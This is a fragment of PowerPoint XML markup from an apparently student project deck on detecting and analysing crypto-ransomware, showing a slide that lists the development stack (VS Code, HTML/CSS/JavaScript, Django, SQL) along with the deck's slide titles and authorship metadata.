              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>	Integrated Development </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>Enviroment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t> : Virtual Studio Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>	Front End Technologies : HTML5,CSS3,Java Script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>	Back End Technology : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>Django</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>	Database Language : SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-IN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31359262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1440</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>222</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Times New Roman</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Cyber Fraud - Detection And Analysis Of The Crypto-Ransomware  </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>1. Introduction</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>2. System Analysis</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>3. Architectural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Implementation &amp; Testing</vt:lpstr>
      <vt:lpstr>4. Implementation &amp; Testing</vt:lpstr>
      <vt:lpstr>4. Implementation &amp; Testing</vt:lpstr>
      <vt:lpstr>5. Results</vt:lpstr>
      <vt:lpstr>5. Results</vt:lpstr>
      <vt:lpstr>5. Results</vt:lpstr>
      <vt:lpstr>6. Conclusions &amp; Future Scope</vt:lpstr>
      <vt:lpstr>6. Conclusions &amp; Future Scope</vt:lpstr>
      <vt:lpstr>Bibliography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VAULT</dc:title>
  <dc:creator>MRUH</dc:creator>
  <cp:lastModifiedBy>Microsoft account</cp:lastModifiedBy>
  <cp:revision>46</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-29T05:45:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-01T04:14:11Z</dcterms:modified>
</cp:coreProperties>
</file>